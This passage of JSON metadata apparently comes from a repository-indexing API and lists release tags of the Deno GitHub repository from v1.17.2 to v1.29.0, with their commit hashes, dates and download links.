"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno